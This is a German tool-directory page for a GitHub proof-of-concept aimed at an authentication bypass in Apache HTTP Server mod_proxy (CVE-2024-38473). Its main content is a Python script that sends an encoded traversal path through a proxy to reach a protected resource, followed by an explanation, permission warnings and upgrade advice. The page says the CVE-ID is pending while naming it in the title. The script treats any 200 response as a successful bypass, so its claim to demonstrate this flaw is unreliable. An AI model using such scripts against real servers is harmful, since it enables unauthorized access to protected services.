Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-38473 — Proof-of-Concept-Skripte, die eine Kodierungsschwachstelle im Apache HTTP Server mod_proxy (CVE-2024-38473) demonstrieren, die eine Authentifizierungsumgehung über manipulierte Anfrage-URLs an Backend-Dienste ermöglicht. | Kitploit
Tools/GitHubGitHub/abdurahmon3236/cve-2024-38473
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubabdurahmon3236/cve-2024-38473

CVE-2024-38473

Proof-of-Concept-Skripte, die eine Kodierungsschwachstelle im Apache HTTP Server mod_proxy (CVE-2024-38473) demonstrieren, die eine Authentifizierungsumgehung über manipulierte Anfrage-URLs an Backend-Dienste ermöglicht.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
32vor 2 JahrenNoch nicht geprüft

Proof of Concept (PoC) für Kodierungsproblem in mod_proxy in Apache HTTP Server

Dieses Repository enthält Proof-of-Concept (PoC)-Skripte zur Demonstration eines Kodierungsproblems im mod_proxy-Modul des Apache HTTP Servers in den Versionen 2.4.59 und früher. Diese Schwachstelle ermöglicht es, Anfrage-URLs mit falscher Kodierung an Backend-Dienste zu senden und dabei potenziell die Authentifizierung durch manipulierte Anfragen zu umgehen.

Inhaltsverzeichnis

  • Schwachstellenbeschreibung
  • Einrichtung und Verwendung
  • Wichtige Hinweise
  • Abhilfe

Schwachstellenbeschreibung

CVE-ID: (Ausstehend)

Übersicht: Ein Kodierungsproblem im mod_proxy-Modul des Apache HTTP Servers in den Versionen 2.4.59 und früher ermöglicht es, Anfrage-URLs mit falscher Kodierung an Backend-Dienste zu senden. Dies kann potenziell Authentifizierungsmechanismen durch manipulierte Anfragen umgehen. Benutzern wird empfohlen, auf Version 2.4.60 zu aktualisieren, die dieses Problem behebt.

Betroffene Versionen:

  • Apache HTTP Server 2.4.59 und früher

Behobene Version:

  • Apache HTTP Server 2.4.60

Einrichtung und Verwendung

Voraussetzungen

  • Python 3.x
  • requests-Bibliothek (pip install requests)

Vorführen der Schwachstelle

  1. Backend-Dienst identifizieren:

    • Gehen Sie davon aus, dass sich der Backend-Dienst unter http://backend-service.example.com befindet.
  2. Bösartige Anfrage erstellen:

    • Die bösartige Anfrage verwendet eine falsche Kodierung, um die Authentifizierung zu umgehen.
  3. PoC-Skript ausführen:

    • Speichern Sie das folgende Skript als mod_proxy_poc.py und führen Sie es aus.

PoC-Skript

Hier ist ein Python-Skript, das die Schwachstelle demonstriert:

root@kitploit:~
import requests

# Configuration
proxy_url = "http://proxy-server.example.com"  # Change this to the proxy server's URL
backend_service_path = "/protected/resource"  # The path to the protected resource on the backend service
malicious_path = "/%2E%2E/protected/resource"  # Incorrectly encoded path to bypass authentication

# Malicious request to be sent via the proxy server
malicious_url = f"{proxy_url}{malicious_path}"

def send_malicious_request():
    try:
        # Send the crafted request to the proxy server
        response = requests.get(malicious_url)
        
        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Headers:", response.headers)
        print("Response Body:", response.text)
        
        if response.status_code == 200:
            print("[+] Successfully bypassed authentication and accessed the protected resource.")
        else:
            print("[-] Failed to bypass authentication.")
    except Exception as e:
        print("[-] An error occurred:", str(e))

if __name__ == "__main__":
    send_malicious_request()

Erklärung

  1. Konfiguration:

    • proxy_url: Die URL des Proxy-Servers.
    • backend_service_path: Der Pfad zur geschützten Ressource auf dem Backend-Dienst.
    • malicious_path: Der falsch kodierte Pfad, um die Authentifizierung zu umgehen.
  2. send_malicious_request:

    • Erstellt eine bösartige URL mit dem falsch kodierten Pfad.
    • Sendet eine GET-Anfrage an den Proxy-Server mit der bösartigen URL.
    • Gibt die Antwortdetails aus, um zu prüfen, ob die Authentifizierung umgangen wurde.

Wichtige Hinweise

  • Berechtigungen: Stellen Sie sicher, dass Sie die ausdrückliche Erlaubnis haben, diese Schwachstelle auf dem Zielsystem zu testen. Unautorisierter Zugriff ist illegal und unethisch.
  • Testumgebung: Führen Sie diesen Test in einer kontrollierten Umgebung durch, um Produktionssysteme nicht zu beeinträchtigen.

Abhilfe

Um diese Schwachstelle zu beheben, aktualisieren Sie auf Apache HTTP Server Version 2.4.60, die das Kodierungsproblem im mod_proxy-Modul behebt.

  • Aktualisierungsanweisungen:
    • Folgen Sie der offiziellen Apache HTTP Server Dokumentation, um die neueste Version herunterzuladen und zu installieren.

Indem Sie Ihre Software auf dem neuesten Stand halten und Sicherheitsbest Practices befolgen, können Sie Schwachstellen wie dieses Kodierungsproblem im mod_proxy-Modul verhindern.

Tool herunterladen